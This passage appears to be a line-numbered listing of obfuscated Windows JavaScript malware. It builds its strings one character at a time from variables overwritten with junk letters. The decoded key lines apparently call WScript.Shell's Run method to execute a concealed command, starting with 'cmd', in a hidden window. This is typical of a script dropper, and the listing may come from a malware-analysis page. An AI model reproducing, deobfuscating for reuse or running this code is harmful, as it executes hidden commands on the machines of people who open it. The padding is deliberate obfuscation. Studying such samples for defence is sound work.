wvfqm + lsmnde + ozhtep ), 16 ); |
|
3 | for ( naciynv = 0 ; naciynv < mfnwhfw[lsmnde + ozhtep + kkijnjor + omhaktih + ifuvy + ymtho] ; ++ naciynv ) | |
4 | { | |
5 | if ( gpqplyhya == mfnwhfw[naciynv] ) | |
6 | { | |
7 | gpqplyhya = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( gpqplyhya !== true ) | |
12 | this[fadikbi + bejhq + anffeeeoj + jezsvjlnb + uyijdad + wulwxiqp + ifuvy][badvpia + kfgcfc + uyijdad + ifuvy] ( ); | |
13 | this[fadikbi + bejhq + anffeeeoj + jezsvjlnb + uyijdad + wulwxiqp + ifuvy][azfjql + jezsvjlnb + ozhtep + wvfqm + ifuvy + ozhtep + rzcoqes + xxeabi + ikvduzur + ozhtep + anffeeeoj + ifuvy] ( fadikbi + bejhq + anffeeeoj + jezsvjlnb + uyijdad + wulwxiqp + ifuvy + suvnn + bejhq + ymtho + ozhtep + lsmnde + lsmnde ) [jezsvjlnb + kfgcfc + kkijnjor] ( anffeeeoj + xmjyfk + nxqizoikd + vfqtvjruf + fapevp + anffeeeoj + vfqtvjruf + wulwxiqp + mknzydkd + ovmifg + ozhtep + jezsvjlnb + zeyxb + ymtho + ozhtep + lsmnde + lsmnde + suvnn + ozhtep + pdnembq + ozhtep + vfqtvjruf + nqqopwm + azfjql + mknzydkd + xmjyfk + xmjyfk + wvfqm + kkijnjor + nxqizoikd + vfqtvjruf + icnnfq + wbkcx + kkijnjor + ygwml + mknzydkd + flrrrrqvq + ozhtep + nqqopwm + fadikbi + ozhtep + xxeabi + gijqtcmml + ozhtep + qwivjtjo + kfgcfc + ozhtep + zeyxb + ifuvy + vfqtvjruf + nqqopwm + rzcoqes + kfgcfc + ifuvy + pcvghjsuj + uyijdad + lsmnde + ozhtep + vfqtvjruf + psfiwqiz + ifuvy + ozhtep + xmjyfk + wulwxiqp + psfiwqiz + zvuqgw + uyijdad + kkijnjor + ygwml + mknzydkd + uyijdad + anffeeeoj + ozhtep + suvnn + wulwxiqp + nxqizoikd + discwb + vfqtvjruf + ymtho + ifuvy + ifuvy + wulwxiqp + lohszdpji + fapevp + fapevp + uukcz + ospjtzwd + kbjei + suvnn + uukcz + txmxszwp + kbjei + suvnn + uukcz + suvnn + ejhkqtvdc + vegemw + mlmes + fapevp + uyijdad + kkijnjor + ygwml + mknzydkd + uyijdad + anffeeeoj + ozhtep + suvnn + wulwxiqp + ymtho + wulwxiqp + icnnfq + iwvjaf + iwvjaf + zeyxb + ifuvy + wvfqm + jezsvjlnb + ifuvy + vfqtvjruf + psfiwqiz + ifuvy + ozhtep + xmjyfk + wulwxiqp + psfiwqiz + zvuqgw + uyijdad + kkijnjor + ygwml + mknzydkd + uyijdad + anffeeeoj + ozhtep + suvnn + wulwxiqp + nxqizoikd + discwb + iwvjaf + iwvjaf + anffeeeoj + xmjyfk + nxqizoikd + vfqtvjruf + fapevp + anffeeeoj + vfqtvjruf + kkijnjor + ozhtep + ifuvy + vfqtvjruf + kfgcfc + zeyxb + ozhtep + vfqtvjruf + zvuqgw + zvuqgw + uukcz + ospjtzwd + kbjei + suvnn + uukcz + txmxszwp + kbjei + suvnn + uukcz + suvnn + ejhkqtvdc + vegemw + mlmes + mfmwutdjl + oelkhb + oelkhb + oelkhb + oelkhb + zvuqgw + nxqizoikd + wvfqm + ygwml + ovmifg + ovmifg + ovmifg + jezsvjlnb + mknzydkd + mknzydkd + ifuvy + zvuqgw + iwvjaf + iwvjaf + anffeeeoj + xmjyfk + nxqizoikd + vfqtvjruf + fapevp + anffeeeoj + vfqtvjruf + jezsvjlnb + ozhtep + omhaktih + zeyxb + ygwml + jezsvjlnb + kbjei + ejhkqtvdc + vfqtvjruf + fapevp + zeyxb + vfqtvjruf + zvuqgw + zvuqgw + uukcz + ospjtzwd + kbjei + suvnn + uukcz + txmxszwp + kbjei + suvnn + uukcz + suvnn + ejhkqtvdc + vegemw + mlmes + mfmwutdjl + oelkhb + oelkhb + oelkhb + oelkhb + zvuqgw + nxqizoikd + wvfqm + ygwml + ovmifg + ovmifg + ovmifg + jezsvjlnb + mknzydkd + mknzydkd + ifuvy + zvuqgw + ospjtzwd + ospjtzwd + kopvtai + kopvtai + uukcz + mlmes + mlmes + ejhkqtvdc + idfrbxk + ejhkqtvdc + kopvtai + ospjtzwd + vegemw + kbjei + suvnn + nxqizoikd + lsmnde + lsmnde, 0, false ); |
|
14 | } | |
15 | iwvjaf = "&"; | |
16 | bxfddsu = "I"; | |
17 | bxfddsu = "I"; | |
18 | bxfddsu = "d"; | |
19 | bxfddsu = "b"; | |
20 | bxfddsu = "D"; | |
21 | bxfddsu = "E"; | |
22 | bxfddsu = "O"; | |
23 | bxfddsu = "B"; | |
24 | bxfddsu = "B"; | |
25 | bxfddsu = "d"; | |
26 | bxfddsu = "B"; | |
27 | bxfddsu = "u"; | |
28 | bxfddsu = "z"; | |
29 | bxfddsu = "r"; | |
30 | bxfddsu = "q"; | |
31 | bxfddsu = "Q"; | |
32 | bxfddsu = "x"; | |
33 | bxfddsu = "k"; | |
34 | bxfddsu = "p"; | |
35 | bxfddsu = "m"; | |
36 | bxfddsu = "g"; | |
37 | bxfddsu = "W"; | |
38 | bxfddsu = "U"; | |
39 | bxfddsu = "I"; | |
40 | bxfddsu = "B"; | |
41 | bxfddsu = "N"; | |
42 | bxfddsu = "O"; | |
43 | bxfddsu = "N"; | |
44 | wvfqm = "m"; | |
45 | wvfqm = "A"; | |
46 | wvfqm = "N"; | |
47 | wvfqm = "m"; | |
48 | wvfqm = "e"; | |
49 | wvfqm = "E"; | |
50 | wvfqm = "l"; | |
51 | wvfqm = "C"; | |
52 | wvfqm = "L"; | |
53 | wvfqm = "v"; | |
54 | wvfqm = "b"; | |
55 | wvfqm = "O"; | |
56 | wvfqm = "W"; | |
57 | wvfqm = "M"; | |
58 | wvfqm = "m"; | |
59 | wvfqm = "Z"; | |
60 | wvfqm = "y"; | |
61 | wvfqm = "C"; | |
62 | wvfqm = "Y"; | |
63 | wvfqm = "d"; | |
64 | wvfqm = "f"; | |
65 | wvfqm = "c"; | |
66 | wvfqm = "Z"; | |
67 | wvfqm = "h"; | |
68 | wvfqm = "a"; | |
69 | wvfqm = "w"; | |
70 | wvfqm = "a"; | |
71 | txmxszwp = "Q"; | |
72 | txmxszwp = "n"; | |
73 | txmxszwp = "P"; | |
74 | txmxszwp = "X"; | |
75 | txmxszwp = "A"; | |
76 | txmxszwp = "q"; | |
77 | txmxszwp = "J"; | |
78 | txmxszwp = "V"; | |
79 | txmxszwp = "z"; | |
80 | txmxszwp = "h"; | |
81 | txmxszwp = "E"; | |
82 | txmxszwp = "e"; | |
83 | txmxszwp = "t"; | |
84 | txmxszwp = "U"; | |
85 | txmxszwp = "4"; | |
86 | qwivjtjo = "d"; | |
87 | qwivjtjo = "c"; | |
88 | qwivjtjo = "J"; | |
89 | qwivjtjo = "p"; | |
90 | qwivjtjo = "g"; | |
91 | qwivjtjo = "f"; | |
92 | qwivjtjo = "q"; | |
93 | qwivjtjo = "t"; | |
94 | qwivjtjo = "t"; | |
95 | qwivjtjo = "N"; | |
96 | qwivjtjo = "q"; | |
97 | qwivjtjo = "Y"; | |
98 | qwivjtjo = "Z"; | |
99 | qwivjtjo = "p"; | |
100 | qwivjtjo = "l"; | |
101 | qwivjtjo = "U"; | |
102 | qwivjtjo = "A"; | |
103 | qwivjtjo = "i"; | |
104 | qwivjtjo = "o"; | |
105 | qwivjtjo = "F"; | |
106 | qwivjtjo = "N"; | |
107 | qwivjtjo = "q"; | |
108 | psfiwqiz = "T"; | |
109 | psfiwqiz = "b"; | |
110 | psfiwqiz = "w"; | |
111 | psfiwqiz = "a"; | |
112 | psfiwqiz = "t"; | |
113 | psfiwqiz = "O"; | |
114 | psfiwqiz = "l"; | |
115 | psfiwqiz = "a"; | |
116 | psfiwqiz = "f"; | |
117 | psfiwqiz = "b"; | |
118 | psfiwqiz = "y"; | |
119 | psfiwqiz = "X"; | |
120 | psfiwqiz = "m"; | |
121 | psfiwqiz = "U"; | |
122 | psfiwqiz = "q"; | |
123 | psfiwqiz = "j"; | |
124 | psfiwqiz = "F"; | |
125 | psfiwqiz = "I"; | |
126 | psfiwqiz = "s"; | |
127 | psfiwqiz = "k"; | |
128 | psfiwqiz = "R"; | |
129 | psfiwqiz = "h"; | |
130 | psfiwqiz = "m"; | |
131 | psfiwqiz = "L"; | |
132 | psfiwqiz = "n"; | |
133 | psfiwqiz = "H"; | |
134 | psfiwqiz = "r"; | |
135 | psfiwqiz = "t"; | |
136 | psfiwqiz = "j"; | |
137 | psfiwqiz = "z"; | |
138 | psfiwqiz = "L"; | |
139 | psfiwqiz = "c"; | |
140 | psfiwqiz = "O"; | |
141 | psfiwqiz = "p"; | |
142 | psfiwqiz = "z"; | |
143 | psfiwqiz = "m"; | |
144 | psfiwqiz = "Z"; | |
145 | psfiwqiz = "N"; | |
146 | psfiwqiz = "y"; | |
147 | psfiwqiz = "c"; | |
148 | psfiwqiz = "o"; | |
149 | psfiwqiz = "r"; | |
150 | psfiwqiz = "C"; | |
151 | psfiwqiz = "%"; | |
152 | nxmjoetz = "S"; | |
153 | nxmjoetz = "w"; | |
154 | nxmjoetz = "D"; | |
155 | nxmjoetz = "v"; | |
156 | nxmjoetz = "u"; | |
157 | nxmjoetz = "z"; | |
158 | nxmjoetz = "O"; | |
159 | nxmjoetz = "I"; | |
160 | nxmjoetz = "L"; | |
161 | nxmjoetz = "c"; | |
162 | nxmjoetz = "Q"; | |
163 | nxmjoetz = "Z"; | |
164 | nxmjoetz = "n"; | |
165 | nxmjoetz = "a"; | |
166 | nxmjoetz = "M"; | |
167 | nxmjoetz = "B"; | |
168 | nxmjoetz = "q"; | |
169 | nxmjoetz = "A"; | |
170 | nxmjoetz = "E"; | |
171 | nxmjoetz = "m"; | |
172 | nxmjoetz = "E"; | |
173 | nxmjoetz = "H"; | |
174 | omhaktih = "d"; | |
175 | omhaktih = "r"; | |
176 | omhaktih = "b"; | |
177 | omhaktih = "b"; | |
178 | omhaktih = "x"; | |
179 | omhaktih = "D"; | |
180 | omhaktih = "N"; | |
181 | omhaktih = "m"; | |
182 | omhaktih = "A"; | |
183 | omhaktih = "K"; | |
184 | omhaktih = "t"; | |
185 | omhaktih = "k"; | |
186 | omhaktih = "a"; | |
187 | omhaktih = "Q"; | |
188 | omhaktih = "l"; | |
189 | omhaktih = "I"; | |
190 | omhaktih = "O"; | |
191 | omhaktih = "h"; | |
192 | omhaktih = "U"; | |
193 | omhaktih = "J"; | |
194 | omhaktih = "D"; | |
195 | omhaktih = "O"; | |
196 | omhaktih = "g"; | |
197 | bejhq = "x"; | |
198 | bejhq = "n"; | |
199 | bejhq = "F"; | |
200 | bejhq = "Y"; | |
201 | bejhq = "A"; | |
202 | bejhq = "I"; | |
203 | bejhq = "F"; | |
204 | bejhq = "x"; | |
205 | bejhq = "i"; | |
206 | bejhq = "g"; | |
207 | bejhq = "w"; | |
208 | bejhq = "k"; | |
209 | bejhq = "P"; | |
210 | bejhq = "P"; | |
211 | bejhq = "J"; | |
212 | bejhq = "P"; | |
213 | bejhq = "D"; | |
214 | bejhq = "S"; | |
215 | zeyxb = "K"; | |
216 | zeyxb = "m"; | |
217 | zeyxb = "Y"; | |
218 | zeyxb = "C"; | |
219 | zeyxb = "z"; | |
220 | zeyxb = "V"; | |
221 | zeyxb = "b"; | |
222 | zeyxb = "I"; | |
223 | zeyxb = "p"; | |
224 | zeyxb = "u"; | |
225 | zeyxb = "x"; | |
226 | zeyxb = "r"; | |
227 | zeyxb = "B"; | |
228 | zeyxb = "V"; | |
229 | zeyxb = "F"; | |
230 | zeyxb = "z"; | |
231 | zeyxb = "W"; | |
232 | zeyxb = "C"; | |
233 | zeyxb = "Z"; | |
234 | zeyxb = "v"; | |
235 | zeyxb = "D"; | |
236 | zeyxb = "R"; | |
237 | zeyxb = "s"; | |
238 | zeyxb = "s"; | |
239 | zeyxb = "g"; | |
240 | zeyxb = "A"; | |
241 | zeyxb = "M"; | |
242 | zeyxb = "E"; | |
243 | zeyxb = "P"; | |
244 | zeyxb = "W"; | |
245 | zeyxb = "T"; | |
246 | zeyxb = "K"; | |
247 | zeyxb = "R"; | |
248 | zeyxb = "J"; | |
249 | zeyxb = "s"; | |
250 | xmjyfk = "d"; | |
251 | xmjyfk = "d"; | |
252 | xmjyfk = "i"; | |
253 | xmjyfk = "m"; | |
254 | rzcoqes = "q"; | |
255 | rzcoqes = "M"; | |
256 | rzcoqes = "j"; | |
257 | rzcoqes = "G"; | |
258 | rzcoqes = "T"; | |
259 | rzcoqes = "R"; | |
260 | rzcoqes = "t"; | |
261 | rzcoqes = "C"; | |
262 | rzcoqes = "f"; | |
263 | rzcoqes = "m"; | |
264 | rzcoqes = "m"; | |
265 | rzcoqes = "H"; | |
266 | rzcoqes = "c"; | |
267 | rzcoqes = "A"; | |
268 | rzcoqes = "D"; | |
269 | rzcoqes = "H"; | |
270 | rzcoqes = "e"; | |
271 | rzcoqes = "o"; | |
272 | rzcoqes = "H"; | |
273 | rzcoqes = "X"; | |
274 | rzcoqes = "r"; | |
275 | rzcoqes = "a"; | |
276 | rzcoqes = "F"; | |
277 | rzcoqes = "Q"; | |
278 | rzcoqes = "b"; | |
279 | rzcoqes = "i"; | |
280 | rzcoqes = "w"; | |
281 | rzcoqes = "g"; | |
282 | rzcoqes = "g"; | |
283 | rzcoqes = "N"; | |
284 | rzcoqes = "Z"; | |
285 | rzcoqes = "y"; | |
286 | rzcoqes = "T"; | |
287 | rzcoqes = "t"; | |
288 | rzcoqes = "x"; | |
289 | rzcoqes = "p"; | |
290 | rzcoqes = "g"; | |
291 | rzcoqes = "f"; | |
292 | rzcoqes = "B"; | |
293 | rzcoqes = "S"; | |
294 | rzcoqes = "O"; | |
295 | wulwxiqp = "x"; | |
296 | wulwxiqp = "c"; | |
297 | wulwxiqp = "B"; | |
298 | wulwxiqp = "n"; | |
299 | wulwxiqp = "B"; | |
300 | wulwxiqp = "r"; | |
301 | wulwxiqp = "J"; | |
302 | wulwxiqp = "w"; | |
303 | wulwxiqp = "O"; | |
304 | wulwxiqp = "Z"; | |
305 | wulwxiqp = "n"; | |
306 | wulwxiqp = "V"; | |
307 | wulwxiqp = "H"; | |
308 | wulwxiqp = "n"; | |
309 | wulwxiqp = "R"; | |
310 | wulwxiqp = "f"; | |
311 | wulwxiqp = "y"; | |
312 | wulwxiqp = "F"; | |
313 | wulwxiqp = "K"; | |
314 | wulwxiqp = "j"; | |
315 | wulwxiqp = "H"; | |
316 | wulwxiqp = "u"; | |
317 | wulwxiqp = "Q"; | |
318 | wulwxiqp = "z"; | |
319 | wulwxiqp = "H"; | |
320 | wulwxiqp = "p"; | |
321 | suvnn = "O"; | |
322 | suvnn = "e"; | |
323 | suvnn = "G"; | |
324 | suvnn = "x"; | |
325 | suvnn = "H"; | |
326 | suvnn = "R"; | |
327 | suvnn = "J"; | |
328 | suvnn = "t"; | |
329 | suvnn = "A"; | |
330 | suvnn = "s"; | |
331 | suvnn = "W"; | |
332 | suvnn = "y"; | |
333 | suvnn = "P"; | |
334 | suvnn = "I"; | |
335 | suvnn = "m"; | |
336 | suvnn = "k"; | |
337 | suvnn = "."; | |
338 | mskwzs = "z"; | |
339 | mskwzs = "u"; | |
340 | mskwzs = "i"; | |
341 | mskwzs = "c"; | |
342 | mskwzs = "S"; | |
343 | mskwzs = "E"; | |
344 | mskwzs = "z"; | |
345 | mskwzs = "Y"; | |
346 | mskwzs = "y"; | |
347 | mskwzs = "z"; | |
348 | mskwzs = "D"; | |
349 | mskwzs = "i"; | |
350 | mskwzs = "h"; | |
351 | mskwzs = "w"; | |
352 | mskwzs = "i"; | |
353 | mskwzs = "d"; | |
354 | mskwzs = "r"; | |
355 | mskwzs = "b"; | |
356 | mskwzs = "J"; | |
357 | mskwzs = "O"; | |
358 | mskwzs = "s"; | |
359 | mskwzs = "J"; | |
360 | mskwzs = "V"; | |
361 | mskwzs = "o"; | |
362 | mskwzs = "H"; | |
363 | mskwzs = "T"; | |
364 | mskwzs = "R"; | |
365 | mskwzs = "M"; | |
366 | mskwzs = "S"; | |
367 | mskwzs = "K"; | |
368 | mskwzs = "U"; | |
369 | mskwzs = "i"; | |
370 | mskwzs = "F"; | |
371 | mskwzs = "C"; | |
372 | mskwzs = "o"; | |
373 | mskwzs = "U"; | |
374 | mskwzs = "X"; | |
375 | mskwzs = "p"; | |
376 | mskwzs = "O"; | |
377 | mskwzs = "d"; | |
378 | mskwzs = "H"; | |
379 | mskwzs = "w"; | |
380 | mskwzs = "F"; | |
381 | mskwzs = "f"; | |
382 | mskwzs = "E"; | |
383 | mknzydkd = "o"; | |
384 | nxqizoikd = "l"; | |
385 | nxqizoikd = "M"; | |
386 | nxqizoikd = "O"; | |
387 | nxqizoikd = "n"; | |
388 | nxqizoikd = "k"; | |
389 | nxqizoikd = "c"; | |
390 | nxqizoikd = "X"; | |
391 | nxqizoikd = "s"; | |
392 | nxqizoikd = "h"; | |
393 | nxqizoikd = "Q"; | |
394 | nxqizoikd = "q"; | |
395 | nxqizoikd = "s"; | |
396 | nxqizoikd = "M"; | |
397 | nxqizoikd = "J"; | |
398 | nxqizoikd = "E"; | |
399 | nxqizoikd = "x"; | |
400 | nxqizoikd = "l"; | |
401 | nxqizoikd = "c"; | |
402 | nxqizoikd = "F"; | |
403 | nxqizoikd = "f"; | |
404 | nxqizoikd = "R"; | |
405 | nxqizoikd = "i"; | |
406 | nxqizoikd = "l"; | |
407 | nxqizoikd = "I"; | |
408 | nxqizoikd = "n"; | |
409 | nxqizoikd = "d"; | |
410 | kbjei = "O"; | |
411 | kbjei = "a"; | |
412 | kbjei = "C"; | |
413 | kbjei = "Y"; | |
414 | kbjei = "X"; | |
415 | kbjei = "U"; | |
416 | kbjei = "P"; | |
417 | kbjei = "V"; | |
418 | kbjei = "q"; | |
419 | kbjei = "i"; | |
420 | kbjei = "U"; | |
421 | kbjei = "l"; | |
422 | kbjei = "n"; | |
423 | kbjei = "q"; | |
424 | kbjei = "W"; | |
425 | kbjei = "x"; | |
426 | kbjei = "H"; | |
427 | kbjei = "K"; | |
428 | kbjei = "w"; | |
429 | kbjei = "E"; | |
430 | kbjei = "n"; | |
431 | kbjei = "u"; | |
432 | kbjei = "j"; | |
433 | kbjei = "W"; | |
434 | kbjei = "m"; | |
435 | kbjei = "V"; | |
436 | kbjei = "H"; | |
437 | kbjei = "j"; | |
438 | kbjei = "i"; | |
439 | kbjei = "i"; | |
440 | kbjei = "L"; | |
441 | kbjei = "j"; | |
442 | kbjei = "A"; | |
443 | kbjei = "L"; | |
444 | kbjei = "b"; | |
445 | kbjei = "C"; | |
446 | kbjei = "O"; | |
447 | kbjei = "Q"; | |
448 | kbjei = "3"; | |
449 | discwb = "t"; | |
450 | discwb = "D"; | |
451 | discwb = "I"; | |
452 | discwb = "r"; | |
453 | discwb = "z"; | |
454 | discwb = "c"; | |
455 | discwb = "b"; | |
456 | discwb = "Y"; | |
457 | discwb = "L"; | |
458 | discwb = "d"; | |
459 | discwb = "D"; | |
460 | discwb = "f"; | |
461 | ifuvy = "p"; | |
462 | ifuvy = "Y"; | |
463 | ifuvy = "J"; | |
464 | ifuvy = "F"; | |
465 | ifuvy = "f"; | |
466 | ifuvy = "C"; | |
467 | ifuvy = "g"; | |
468 | ifuvy = "H"; | |
469 | ifuvy = "T"; | |
470 | ifuvy = "M"; | |
471 | ifuvy = "w"; | |
472 | ifuvy = "J"; | |
473 | ifuvy = "g"; | |
474 | ifuvy = "x"; | |
475 | ifuvy = "G"; | |
476 | ifuvy = "i"; | |
477 | ifuvy = "p"; | |
478 | ifuvy = "p"; | |
479 | ifuvy = "m"; | |
480 | ifuvy = "U"; | |
481 | ifuvy = "E"; | |
482 | ifuvy = "R"; | |
483 | ifuvy = "R"; | |
484 | ifuvy = "T"; | |
485 | ifuvy = "t"; | |
486 | fapevp = "g"; | |
487 | fapevp = "h"; | |
488 | fapevp = "R"; | |
489 | fapevp = "n"; | |
490 | fapevp = "O"; | |
491 | fapevp = "I"; | |
492 | fapevp = "F"; | |
493 | fapevp = "H"; | |
494 | fapevp = "e"; | |
495 | fapevp = "S"; | |
496 | fapevp = "e"; | |
497 | fapevp = "Y"; | |
498 | fapevp = "a"; | |
499 | fapevp = "U"; | |
500 | fapevp = "Z"; | |
501 | fapevp = "/"; | |
502 | fadikbi = "w"; | |
503 | fadikbi = "v"; | |
504 | fadikbi = "z"; | |
505 | fadikbi = "f"; | |
506 | fadikbi = "n"; | |
507 | fadikbi = "U"; | |
508 | fadikbi = "o"; | |
509 | fadikbi = "v"; | |
510 | fadikbi = "W"; | |
511 | fadikbi = "r"; | |
512 | fadikbi = "m"; | |
513 | fadikbi = "u"; | |
514 | fadikbi = "G"; | |
515 | fadikbi = "U"; | |
516 | fadikbi = "y"; | |
517 | fadikbi = "o"; | |
518 | fadikbi = "z"; | |
519 | fadikbi = "W"; | |
520 | ygwml = "b"; | |
521 | ygwml = "a"; | |
522 | ygwml = "q"; | |
523 | ygwml = "Y"; | |
524 | ygwml = "s"; | |
525 | ygwml = "E"; | |
526 | ygwml = "U"; | |
527 | ygwml = "E"; | |
528 | ygwml = "w"; | |
529 | ygwml = "T"; | |
530 | ygwml = "a"; | |
531 | ygwml = "S"; | |
532 | ygwml = "l"; | |
533 | ygwml = "e"; | |
534 | ygwml = "a"; | |
535 | ygwml = "y"; | |
536 | ygwml = "b"; | |
537 | ygwml = "l"; | |
538 | ygwml = "Q"; | |
539 | ygwml = "Y"; | |
540 | ygwml = "O"; | |
541 | ygwml = "x"; | |
542 | ygwml = "s"; | |
543 | ygwml = "h"; | |
544 | ygwml = "X"; | |
545 | ygwml = "Y"; | |
546 | ygwml = "F"; | |
547 | ygwml = "v"; | |
548 | ovmifg = "f"; | |
549 | ovmifg = "m"; | |
550 | ovmifg = "G"; | |
551 | ovmifg = "n"; | |
552 | ovmifg = "H"; | |
553 | ovmifg = "p"; | |
554 | ovmifg = "a"; | |
555 | ovmifg = "v"; | |
556 | ovmifg = "H"; | |
557 | ovmifg = "l"; | |
558 | ovmifg = "C"; | |
559 | ovmifg = "A"; | |
560 | ovmifg = "b"; | |
561 | ovmifg = "Z"; | |
562 | ovmifg = "a"; | |
563 | ovmifg = "W"; | |
564 | ovmifg = "w"; | |
565 | azfjql = "G"; | |
566 | azfjql = "G"; | |
567 | azfjql = "X"; | |
568 | azfjql = "B"; | |
569 | azfjql = "G"; | |
570 | azfjql = "N"; | |
571 | azfjql = "w"; | |
572 | azfjql = "P"; | |
573 | azfjql = "e"; | |
574 | azfjql = "g"; | |
575 | azfjql = "G"; | |
576 | azfjql = "C"; | |
577 | azfjql = "o"; | |
578 | azfjql = "g"; | |
579 | azfjql = "e"; | |
580 | azfjql = "O"; | |
581 | azfjql = "Z"; | |
582 | azfjql = "i"; | |
583 | azfjql = "m"; | |
584 | azfjql = "y"; | |
585 | azfjql = "G"; | |
586 | azfjql = "f"; | |
587 | azfjql = "D"; | |
588 | azfjql = "T"; | |
589 | azfjql = "P"; | |
590 | azfjql = "C"; | |
591 | azfjql = "C"; | |
592 | olzjkyi = "e"; | |
593 | olzjkyi = "D"; | |
594 | olzjkyi = "t"; | |
595 | olzjkyi = "X"; | |
596 | olzjkyi = "Y"; | |
597 | olzjkyi = "X"; | |
598 | olzjkyi = "d"; | |
599 | olzjkyi = "K"; | |
600 | olzjkyi = "U"; | |
601 | oelkhb = "Q"; | |
602 | oelkhb = "T"; | |
603 | oelkhb = "q"; | |
604 | oelkhb = "N"; | |
605 | oelkhb = "f"; | |
606 | oelkhb = "k"; | |
607 | oelkhb = "Y"; | |
608 | oelkhb = "B"; | |
609 | oelkhb = "m"; | |
610 | oelkhb = "J"; | |
611 | oelkhb = "d"; | |
612 | oelkhb = "f"; | |
613 | oelkhb = "d"; | |
614 | oelkhb = "O"; | |
615 | oelkhb = "M"; | |
616 | oelkhb = "O"; | |
617 | oelkhb = "s"; | |
618 | oelkhb = "T"; | |
619 | oelkhb = "E"; | |
620 | oelkhb = "G"; | |
621 | oelkhb = "q"; | |
622 | oelkhb = "W"; | |
623 | oelkhb = "q"; | |
624 | oelkhb = "W"; | |
625 | oelkhb = "S"; | |
626 | oelkhb = "T"; | |
627 | oelkhb = "j"; | |
628 | oelkhb = "y"; | |
629 | oelkhb = "c"; | |
630 | oelkhb = "f"; | |
631 | oelkhb = "M"; | |
632 | oelkhb = "k"; | |
633 | oelkhb = "I"; | |
634 | oelkhb = "H"; | |
635 | oelkhb = "m"; | |
636 | oelkhb = "E"; | |
637 | oelkhb = "L"; | |
638 | oelkhb = "Q"; | |
639 | oelkhb = "R"; | |
640 | oelkhb = "W"; | |
641 | oelkhb = "J"; | |
642 | oelkhb = "H"; | |
643 | oelkhb = "8"; | |
644 | gijqtcmml = "J"; | |
645 | gijqtcmml = "H"; | |
646 | gijqtcmml = "H"; | |
647 | gijqtcmml = "m"; | |
648 | gijqtcmml = "R"; | |
649 | gijqtcmml = "s"; | |
650 | gijqtcmml = "o"; | |
651 | gijqtcmml = "h"; | |
652 | gijqtcmml = "Y"; | |
653 | gijqtcmml = "V"; | |
654 | gijqtcmml = "Y"; | |
655 | gijqtcmml = "g"; | |
656 | gijqtcmml = "a"; | |
657 | gijqtcmml = "e"; | |
658 | gijqtcmml = "n"; | |
659 | gijqtcmml = "x"; | |
660 | gijqtcmml = "c"; | |
661 | gijqtcmml = "g"; | |
662 | gijqtcmml = "v"; | |
663 | gijqtcmml = "m"; | |
664 | gijqtcmml = "t"; | |
665 | gijqtcmml = "M"; | |
666 | gijqtcmml = "O"; | |
667 | gijqtcmml = "u"; | |
668 | gijqtcmml = "T"; | |
669 | gijqtcmml = "N"; | |
670 | gijqtcmml = "e"; | |
671 | gijqtcmml = "p"; | |
672 | gijqtcmml = "K"; | |
673 | gijqtcmml = "F"; | |
674 | gijqtcmml = "D"; | |
675 | gijqtcmml = "y"; | |
676 | gijqtcmml = "x"; | |
677 | gijqtcmml = "s"; | |
678 | gijqtcmml = "A"; | |
679 | gijqtcmml = "f"; | |
680 | gijqtcmml = "W"; | |
681 | gijqtcmml = "N"; | |
682 | gijqtcmml = "n"; | |
683 | gijqtcmml = "y"; | |
684 | gijqtcmml = "X"; | |
685 | gijqtcmml = "j"; | |
686 | gijqtcmml = "k"; | |
687 | gijqtcmml = "R"; | |
688 | icnnfq = "x"; | |
689 | icnnfq = "f"; | |
690 | icnnfq = "u"; | |
691 | icnnfq = "R"; | |
692 | icnnfq = "K"; | |
693 | icnnfq = "F"; | |
694 | icnnfq = "k"; | |
695 | icnnfq = "z"; | |
696 | icnnfq = "A"; | |
697 | icnnfq = "s"; | |
698 | icnnfq = "I"; | |
699 | icnnfq = "m"; | |
700 | icnnfq = "S"; | |
701 | icnnfq = "l"; | |
702 | icnnfq = "S"; | |
703 | icnnfq = "u"; | |
704 | icnnfq = "p"; | |
705 | icnnfq = "G"; | |
706 | icnnfq = "U"; | |
707 | icnnfq = "y"; | |
708 | icnnfq = "i"; | |
709 | icnnfq = "J"; | |
710 | icnnfq = "\""; | |
711 | wbkcx = "w"; | |
712 | wbkcx = "O"; | |
713 | wbkcx = "D"; | |
714 | wbkcx = "Y"; | |
715 | wbkcx = "k"; | |
716 | wbkcx = "b"; | |
717 | wbkcx = "Y"; | |
718 | wbkcx = "y"; | |
719 | wbkcx = "o"; | |
720 | wbkcx = "I"; | |
721 | uukcz = "b"; | |
722 | uukcz = "a"; | |
723 | uukcz = "V"; | |
724 | uukcz = "B"; | |
725 | uukcz = "v"; | |
726 | uukcz = "e"; | |
727 | uukcz = "k"; | |
728 | uukcz = "Y"; | |
729 | uukcz = "L"; | |
730 | uukcz = "h"; | |
731 | uukcz = "q"; | |
732 | uukcz = "q"; | |
733 | uukcz = "d"; | |
734 | uukcz = "e"; | |
735 | uukcz = "1"; | |
736 | dmijzo = "r"; | |
737 | dmijzo = "y"; | |
738 | dmijzo = "z"; | |
739 | dmijzo = "q"; | |
740 | dmijzo = "k"; | |
741 | dmijzo = "L"; | |
742 | dmijzo = "U"; | |
743 | dmijzo = "s"; | |
744 | dmijzo = "W"; | |
745 | dmijzo = "n"; | |
746 | dmijzo = "Z"; | |
747 | dmijzo = "F"; | |
748 | dmijzo = "A"; | |
749 | dmijzo = "d"; | |
750 | dmijzo = "w"; | |
751 | dmijzo = "m"; | |
752 | dmijzo = "v"; | |
753 | dmijzo = "G"; | |
754 | dmijzo = "E"; | |
755 | dmijzo = "u"; | |
756 | dmijzo = "v"; | |
757 | dmijzo = "K"; | |
758 | mlmes = "w"; | |
759 | mlmes = "R"; | |
760 | mlmes = "W"; | |
761 | mlmes = "t"; | |
762 | mlmes = "e"; | |
763 | mlmes = "y"; | |
764 | mlmes = "i"; | |
765 | mlmes = "x"; | |
766 | mlmes = "b"; | |
767 | mlmes = "A"; | |
768 | mlmes = "v"; | |
769 | mlmes = "V"; | |
770 | mlmes = "I"; | |
771 | mlmes = "a"; | |
772 | mlmes = "u"; | |
773 | mlmes = "e"; | |
774 | mlmes = "c"; | |
775 | mlmes = "l"; | |
776 | mlmes = "G"; | |
777 | mlmes = "w"; | |
778 | mlmes = "q"; | |
779 | mlmes = "O"; | |
780 | mlmes = "k"; | |
781 | mlmes = "i"; | |
782 | mlmes = "j"; | |
783 | mlmes = "U"; | |
784 | mlmes = "L"; | |
785 | mlmes = "W"; | |
786 | mlmes = "w"; | |
787 | mlmes = "P"; | |
788 | mlmes = "f"; | |
789 | mlmes = "W"; | |
790 | mlmes = "N"; | |
791 | mlmes = "Q"; | |
